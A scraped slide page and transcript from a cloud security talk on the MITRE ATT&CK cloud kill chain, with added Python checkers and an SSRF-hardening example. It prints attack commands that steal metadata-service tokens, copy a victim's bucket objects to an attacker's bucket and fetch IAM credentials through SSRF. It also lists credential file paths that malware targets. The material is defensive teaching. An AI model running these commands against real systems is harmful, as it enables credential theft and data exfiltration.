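            findings.append({"sid": stmt.get("Sid", "<no sid>"),
                             "actions": _as_list(stmt.get("Action"))})
    return findings


# --- constructed samples -------------------------------------------------
STORAGE_ACCESS_ROLE = {      # the role definition from the slide
    "assignableScopes": ["/subscriptions/${var.subscription_id}"],
    "permissions": [{"actions": [
        "Microsoft.Storage/storageAccounts/listKeys/action",
        "Microsoft.Storage/storageAccounts/ListAccountSas/action",
        "Microsoft.Storage/storageAccounts/read"]}],
    "roleName": "Storage Access",
}
SCOPED_ROLE = {              # wildcard actions, but assignable to one resource group only
    "assignableScopes": ["/subscriptions/${var.subscription_id}/resourceGroups/rg-app"],
    "permissions": [{"actions": ["Microsoft.Storage/*"]}],
    "roleName": "App Storage Access",
}
PROJECT_POLICY = {"bindings": [
    {"role": "roles/editor",
     "members": ["serviceAccount:123456789012-compute@developer.gserviceaccount.com"]},
    {"role": "roles/viewer", "members": ["user:alice@example.com"]},
]}
CI_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "LaunchWorkers", "Effect": "Allow",
     "Action": ["ec2:RunInstances", "iam:PassRole"], "Resource": "*"},
    {"Sid": "PassOnlyWorkerRole", "Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::123456789012:role/worker-role"},
]}
```

The slide's role is reported (subscription scope plus both key-listing actions), the resource-group-scoped role is not even though its wildcard covers the same actions, the Editor binding on the default compute service account is reported, and only the LaunchWorkers statement is flagged on the AWS side: PassRole restricted to one role ARN is the shape the fix takes. IAM Recommender (GCP) and IAM Access Analyzer (AWS) surface the first two classes from real usage data; the PassRole check is the one you still have to write yourself.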
Data Exfiltration: Transferring Data Cross Tenant
Attackers leverage private service access (private link) to exfiltrate data across the cloud provider's backbone network:
• Private link services are designed to help customers keep data from traversing the Internet
• Default policy (AWS, GCP) allows multi-tenant access to the cloud provider APIs
• May allow data to move cross-tenant between resources without network and firewall inspection
An S3 VPC endpoint with the default "Principal": "*" policy, for example, lets a compromised instance write to a bucket in any AWS account over the endpoint; pinning the endpoint policy with aws:PrincipalOrgID and aws:ResourceOrgID keeps both the caller and the target inside the organization.
Data Exfiltration: Stolen Credential Pivoting
Exfiltrating data from the victim's Google Cloud project using the stolen credential:

export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token)

# List all storage buckets in the victim's project
curl -s -H "Authorization: Bearer $BEARER_TOKEN" \
  "https://storage.googleapis.com/storage/v1/b?project=victims-project"

# Copy objects from the victim's bucket to the attacker's bucket
curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN" \
  "https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers-bucket/o/data.pdf"

The copy succeeds because the attacker can grant the victim's service account write access on a bucket in their own project; the object never leaves Google's network, which is exactly the transfer a VPC Service Controls perimeter is built to stop.
Breaking The Kill Chain: MITRE ATT&CK T1537
Defending against privilege escalation and data exfiltration requires additional cloud-native controls to prevent data from leaving the organization's tenant:
• IAM Access Analyzer (AWS) and IAM Recommender (GCP)
• Private link services and network access rules (AWS / Azure)
• VPC Service Controls (Google Cloud)
Breaking The Kill Chain: IAM Recommender
Reviewing IAM Recommender reports and reducing excessive permissions.
Breaking The Kill Chain: Service Endpoint Configuration
Preventing data exfiltration with private link services and network access policy.
Breaking The Kill Chain: VPC Service Controls
Configuring a VPC Service Controls perimeter to prevent data exfiltration:
• Perimeter includes the authorized projects
• In-scope services include the GCS storage service
• Unauthorized projects and external clients cannot interact with the target GCS bucket
Conclusions
Closing Remarks
Breaking The Cloud Kill Chain requires an in-depth understanding of cloud-native services and configurations:
• Resources can be made public too easily; build guardrails with the policy hierarchy
• Credential management continues to be a problem; move to workload identity federation
• Cloud resources are Internet exposed too easily; central network inspection is critical
• New ways to hide & exfiltrate data exist; focus on building network identity perimeters
Thank you for attending!
Questions?

More Related Content

What's hot

What's hot (20)

Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Power of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityPower of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure security
 
Security Best Practices on AWS
Security Best Practices on AWSSecurity Best Practices on AWS
Security Best Practices on AWS
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
 
Fundamentals of AWS Security
Fundamentals of AWS SecurityFundamentals of AWS Security
Fundamentals of AWS Security
 
Cloud Security Architecture.pptx
Cloud Security Architecture.pptxCloud Security Architecture.pptx
Cloud Security Architecture.pptx
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
 
Govern your Azure environment through Azure Policy
Govern your Azure environment through Azure PolicyGovern your Azure environment through Azure Policy
Govern your Azure environment through Azure Policy
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
 
Azure security architecture
Azure security architectureAzure security architecture
Azure security architecture
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration Testing
 
Automating AWS security and compliance
Automating AWS security and compliance Automating AWS security and compliance
Automating AWS security and compliance
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
Professional Services for Cyber Recovery .pptx
Professional Services for Cyber Recovery .pptxProfessional Services for Cyber Recovery .pptx
Professional Services for Cyber Recovery .pptx
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
 
Introduction to DevOps on AWS
Introduction to DevOps on AWSIntroduction to DevOps on AWS
Introduction to DevOps on AWS
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK framework
 
3 Modern Security - Secure identities to reach zero trust with AAD
3   Modern Security - Secure identities to reach zero trust with AAD3   Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD
 
Scalable threat modelling with risk patterns
Scalable threat modelling with risk patternsScalable threat modelling with risk patterns
Scalable threat modelling with risk patterns
 
Azure Governance for Enterprise
Azure Governance for EnterpriseAzure Governance for Enterprise
Azure Governance for Enterprise
 

Similar to Breaking The Cloud Kill Chain

AWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptxAWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptx
Hitendrasingh79
 

Similar to Breaking The Cloud Kill Chain (20)

Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWS
 
Aws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | DallasAws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | Dallas
 
AWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS Security
 
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations   Eevidence Collection, Security and Compliance Be...CIS Compliance Automations   Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
 
AWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - HoustonAWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - Houston
 
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats
 
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the Cloud
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud Security
 
Advanced Security Best Practices Masterclass
Advanced Security Best Practices MasterclassAdvanced Security Best Practices Masterclass
Advanced Security Best Practices Masterclass
 
AWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design PatternsAWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design Patterns
 
Network Security and Access Control within AWS
Network Security and Access Control within AWS Network Security and Access Control within AWS
Network Security and Access Control within AWS
 
Understanding AWS Security
Understanding AWS SecurityUnderstanding AWS Security
Understanding AWS Security
 
Building A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for ScaleBuilding A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for Scale
 
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
 
Comenzando com la nube hibrida
Comenzando com la nube hibrida Comenzando com la nube hibrida
Comenzando com la nube hibrida
 
DevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security SuccessDevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security Success
 
AWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptxAWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptx
 
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 ThreatsHackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats
 

More from Puma Security, LLC

More from Puma Security, LLC (11)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
DevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit TestsDevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit Tests
 
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated EnvironmentsLessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
 
Winning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless InfrastructureWinning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless Infrastructure
 
Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020
 
Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2
 
Cloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata ServiceCloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata Service
 
DevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security SuccessDevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security Success
 
Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps Pipeline
 
Secure DevOps: A Puma's Tail
Secure DevOps: A Puma's TailSecure DevOps: A Puma's Tail
Secure DevOps: A Puma's Tail
 
Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma Scan
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 

Recently uploaded (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Breaking The Cloud Kill Chain

  • 2. Eric Johnson • Principal Security Engineer, Puma Security → Coder: cloud infrastructure automation, CI / CD orchestration, static analysis engine, security tools → Security assessments: Cloud, DevOps, source code, web apps, mobile apps • Senior Instructor, SANS Institute → Contributing author of SEC540, SEC510, SEC549 • Education & Training → Iowa State M.S. Information Assurance, B.S. Computer Engineering → AWS Certified Developer, CISSP, GPCS, GSSP, GWAPT • Contact information → Email: ejohnson@pumasecurity.io → LinkedIn: https://www.linkedin.com/in/eric-m-johnson/ → Twitter: @emjohn20 $ aws sts get-caller-identity 2
  • 3. ŒCloud MITRE ATT&CK Framework Cloud Infrastructure Discovery ŽUnsecured Credentials Network Service Discovery Transfer Data to Cloud Account Agenda 3
  • 4. MITRE ATT&CK tactics covering cloud-based attack techniques: Understanding the Cloud Kill Chain 4
  • 5. The MITRE ATT&CK Cloud Matrix guides our attack methodology for the key cloud services: MITRE ATT&CK Cloud Services 5
  • 7. MITRE ATT&CK T1580: Discovering infrastructure and resources misconfigured for public cloud access: Cloud Infrastructure Discovery 7 • Storage buckets • Big data sets / databases • Container image repositories • Secrets and cryptographic keys • Virtual machine image or database snapshots
  • 8. AWS Exposable Resources, by Scott Piper, contains a list of non-VPC bound AWS resources that can also be exposed publicly: AWS Publicly Exposable Resources 8 • S3 Bucket ACLs and public bucket policy • EBS Volume Snapshots shared publicly • EC2 Amazon Machine Images shared publicly • ECR container image public repositories • RDS Database and Cluster Snapshots • SQS Queue public policy • SNS notification topics public policy • Lambda function URLs provided a dedicated HTTPS endpoint • More at https://github.com/SummitRoute/ aws_exposable_resources
  • 9. Big Query Datasets support sharing with allUsers and external cloud identity accounts: BigQuery Public Datasets 9
• 10. Azure Virtual Machine Disk Snapshots
  • Sharable with other users in the AD tenant
  • Support direct downloads using SAS tokens
  • Provide a non-VNet-bound way to exfiltrate snapshots
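The detective side of slides 8 to 10, as an added example that is not part of the talk: a small checker that walks an AWS resource policy (S3 bucket, SQS queue, SNS topic policies all share the shape) for grants to everyone, and a BigQuery dataset access list for allUsers / allAuthenticatedUsers. The sample policies and the dataset are constructed for the example; the bucket, queue, dataset and account names are made up.

```python
"""Find public-sharing grants on non-VPC-bound resources (MITRE ATT&CK T1580).

Added example, not code from the talk. The policies below are constructed
samples in the shape of a real S3 bucket policy, an SQS queue policy and a
BigQuery dataset 'access' list; the resource names are made up.
"""

PUBLIC_GCP_MEMBERS = {"allUsers", "allAuthenticatedUsers"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal) -> bool:
    """True for Principal "*" or {"AWS": "*"}, the two spellings of 'everyone'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def find_public_aws_statements(policy: dict) -> list:
    """Return (Sid, verdict) for Allow statements granted to everyone.

    verdict is "public" when nothing scopes the grant, or "conditional" when a
    Condition block is present: aws:SourceArn, aws:PrincipalOrgID or
    aws:SourceVpce may still limit it, so it needs review rather than an
    automatic verdict.
    """
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_public(stmt.get("Principal")):
            continue
        verdict = "conditional" if stmt.get("Condition") else "public"
        findings.append((stmt.get("Sid", "<no-sid>"), verdict))
    return findings


def find_public_bigquery_access(dataset: dict) -> list:
    """Return (member, role) for access entries granted to allUsers / allAuthenticatedUsers.

    BigQuery lists allUsers as an iamMember entry and allAuthenticatedUsers as
    a specialGroup entry, so both fields are checked.
    """
    findings = []
    for entry in dataset.get("access", []):
        for field in ("iamMember", "specialGroup"):
            member = entry.get(field)
            if member in PUBLIC_GCP_MEMBERS:
                findings.append((member, entry.get("role")))
    return findings


# Constructed samples (not real resources).
SAMPLE_BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-reports/*"},
        {"Sid": "DeployWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:role/deploy"},
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-reports/*"},
    ],
}

SAMPLE_QUEUE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "SnsPublish", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "sqs:SendMessage",
         "Resource": "arn:aws:sqs:us-east-1:111122223333:orders",
         "Condition": {"ArnEquals": {"aws:SourceArn": "arn:aws:sns:us-east-1:111122223333:orders"}}},
    ],
}

SAMPLE_DATASET = {
    "datasetReference": {"projectId": "example-project", "datasetId": "telemetry"},
    "access": [
        {"role": "OWNER", "userByEmail": "owner@example.com"},
        {"role": "READER", "specialGroup": "allAuthenticatedUsers"},
    ],
}

if __name__ == "__main__":
    print(find_public_aws_statements(SAMPLE_BUCKET_POLICY))
    print(find_public_aws_statements(SAMPLE_QUEUE_POLICY))
    print(find_public_bigquery_access(SAMPLE_DATASET))
```

Feed it the output of `aws s3api get-bucket-policy`, `aws sqs get-queue-attributes` / `aws sns get-topic-attributes`, or `bq show --format=json`, and treat "conditional" hits as a review queue rather than a pass: a Condition on aws:SourceArn still lets any principal who can spoof that source in.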
• 11. Breaking The Kill Chain: MITRE ATT&CK T1580. Defending against resource misconfiguration starts with applying detective and preventative policies in the resource hierarchy:
  • AWS: Service Control Policy (SCP)
  • Azure: Azure Policy
  • GCP: Organization Policy
• 12. Breaking The Kill Chain: Cloud Resource Hierarchy. Service Control Policy (SCP) documents can attach to the root, OU, and account level nodes in the AWS organization.
• 13. Breaking The Kill Chain: Service Control Policies. Example SCPs blocking API calls that modify the S3 account public access block and that create or update Lambda function URLs without IAM authentication:

    {
      "Statement": [
        {
          "Action": [
            "s3:PutAccountPublicAccessBlock"
          ],
          "Resource": "*",
          "Effect": "Deny"
        }
      ]
    }

    {
      "Statement": [
        {
          "Action": [
            "lambda:CreateFunctionUrlConfig",
            "lambda:UpdateFunctionUrlConfig"
          ],
          "Resource": "arn:aws:lambda:*:*:function:*",
          "Effect": "Deny",
          "Condition": {
            "StringNotEquals": {
              "lambda:FunctionUrlAuthType": "AWS_IAM"
            …
    }
• 15. Unsecured Credentials: MITRE ATT&CK T1552 covers discovering insecurely stored IAM and service account credentials. Unsecured credential locations:
  • Bash history
  • Configuration files
  • Source code
  • Version control
  • Instance Metadata Service
  • Environment variables
• 16. Cloud Credential Types: attackers target credentials that map to many different resource types across the cloud providers:
  • AWS IAM: IAM Users & Roles
  • Azure AD: Service Principals & Managed Identities
  • Cloud Identity: Service Accounts
• 17. Configuration File Credentials: cloud-focused malware (e.g., TeamTNT) targets common locations holding cleartext credentials:
  • ~/.aws/credentials
  • ~/.azure/accessTokens.json
  • ~/.config/gcloud/*credential*
  • ~/.ssh/*
• 18. Version Control and Package Managers
  • Node Package Manager (npm)
    → Scanned by Aidan Steele in October 2021
    → Identified 117 valid API keys, including 30 AWS root access keys
    → https://sec549.com/id259
  • Python Package Index (PyPI)
    → Scanned by Tom Forbes in January 2023
    → Identified 57 valid AWS API keys, including 11 AWS root access keys
    → https://sec549.com/id260
• 19. Environment Variable Credentials
  • Continuous Integration pipelines, containers, and functions often have secrets stored in environment variables
  • Local File Inclusion (LFI) and Command Injection vulnerabilities can allow attackers to exfiltrate environment variables

    env | grep 'AWS'
    AWS_LAMBDA_FUNCTION_VERSION=$LATEST
    AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g==
    AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther
    AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a
    AWS_DEFAULT_REGION=us-east-1
    AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG
    AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A
• 20. Server-Side Request Forgery Credential Extraction: Server-Side Request Forgery (SSRF) vulnerabilities can allow attackers to communicate directly with virtual machine instance metadata services:

    curl -s "https://nimbus.labs/api/emrs?resource=http://169.254.169.254/latest/meta-data/iam/security-credentials/nimbus-iam-role"
    {
      "Code" : "Success",
      "LastUpdated" : "2020-04-16T18:36:31Z",
      "Type" : "AWS-HMAC",
      "AccessKeyId" : "ASIA54BL6PJR3MV6PUNZ",
      "SecretAccessKey" : "S0M6vF4UmMlfmV5B/bM2lalWpdTzocbUsSWMMHRI",
      "Token" : "IQoJb3JpZ2luX2VjEJP...3QtMSJGMEQCIGlgtwykQYitLv8Vg==",
      "Expiration" : "2020-04-17T00:52:19Z"
    }
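The application-side fix for the request above, as an added example that is not from the talk: `vulnerable_proxy()` is the pattern behind `/api/emrs?resource=` (fetch whatever URL the caller supplies), and `hardened_proxy()` refuses any target that is, or resolves to, a link-local, private or metadata address, including the IPv4-mapped and decimal spellings of 169.254.169.254 that string checks miss. The HTTP client and DNS resolver are injected as callables so the block runs offline; `fake_fetch`, `fake_resolve`, the IMDS credential document they return, and the hostnames `rebind.attacker.test` / `example.com` are all constructed for the example.

```python
"""Stop an SSRF proxy from reaching the instance metadata service (IMDS).

Added example, not code from the talk. vulnerable_proxy() is the pattern behind
the /api/emrs?resource= request on the slide; hardened_proxy() refuses targets
that are, or resolve to, link-local, private or IMDS addresses. fetch and
resolve are injected so the example runs offline; in production they would be
the real HTTP client and DNS.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Hostnames the providers use for IMDS; reaching it by name is as bad as by IP.
METADATA_HOSTNAMES = {"metadata.google.internal", "metadata", "instance-data"}
ALLOWED_SCHEMES = {"http", "https"}


def _parse_ip(host: str):
    """ip_address for IP-literal hosts (dotted, IPv6, or curl-style decimal), else None."""
    try:
        if host.isdigit():
            return ipaddress.ip_address(int(host))   # http://2852039166/ is 169.254.169.254
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                      # ::ffff:169.254.169.254
    return addr


def _is_internal(addr) -> bool:
    """169.254.0.0/16 and fd00:ec2::254 (IMDS), RFC1918, loopback, reserved, unspecified."""
    return (addr.is_link_local or addr.is_private or addr.is_loopback
            or addr.is_reserved or addr.is_unspecified)


def _default_resolve(host: str) -> set:
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_fetch_target(url: str, resolve=_default_resolve) -> bool:
    """Allow only http(s) URLs whose host is, and resolves to, a public address."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ALLOWED_SCHEMES or not host:
        return False
    if host in METADATA_HOSTNAMES or host.endswith(".internal"):
        return False
    literal = _parse_ip(host)
    if literal is not None:
        return not _is_internal(literal)
    # A public name can still point at 169.254.169.254, so check every answer.
    # Connect to the address that was checked instead of re-resolving later;
    # otherwise DNS rebinding can swap the answer between check and use.
    try:
        answers = resolve(host)
    except OSError:
        return False
    for answer in answers:
        addr = _parse_ip(answer)
        if addr is None or _is_internal(addr):
            return False
    return bool(answers)


def vulnerable_proxy(resource: str, fetch) -> str:
    """The bug on the slide: the caller-supplied URL is fetched as given."""
    return fetch(resource)


def hardened_proxy(resource: str, fetch, resolve=_default_resolve) -> str:
    if not is_safe_fetch_target(resource, resolve):
        raise ValueError("refusing to fetch a non-public target")
    return fetch(resource)


# Constructed stand-ins so the example runs offline (not real credentials or hosts).
IMDS_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/nimbus-iam-role"


def fake_fetch(url: str) -> str:
    """Pretend HTTP client: returns a made-up IMDS credential document for IMDS URLs."""
    if url.startswith("http://169.254.169.254/"):
        return '{"Code": "Success", "AccessKeyId": "ASIAEXAMPLE", "SecretAccessKey": "example"}'
    return "<html>ok</html>"


def fake_resolve(host: str) -> set:
    """Pretend DNS: rebind.attacker.test answers with the IMDS address."""
    return {"169.254.169.254"} if host == "rebind.attacker.test" else {"93.184.216.34"}


if __name__ == "__main__":
    print(vulnerable_proxy(IMDS_URL, fake_fetch))          # credentials leak
    print(is_safe_fetch_target(IMDS_URL, fake_resolve))    # False
```

Two caveats a practitioner would add: the check above normalises decimal and IPv4-mapped forms but not every exotic spelling (octal octets, hex), so pair it with an allowlist of the hosts the feature actually needs to reach; and on the VM side, require IMDSv2 (session tokens, hop limit 1) so that a plain GET from an SSRF primitive no longer returns the role credentials at all.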
• 21. Breaking The Kill Chain: MITRE ATT&CK T1552. Defending against unsecured credentials requires defense in depth controls:
  • Secrets Scanning: version control repositories
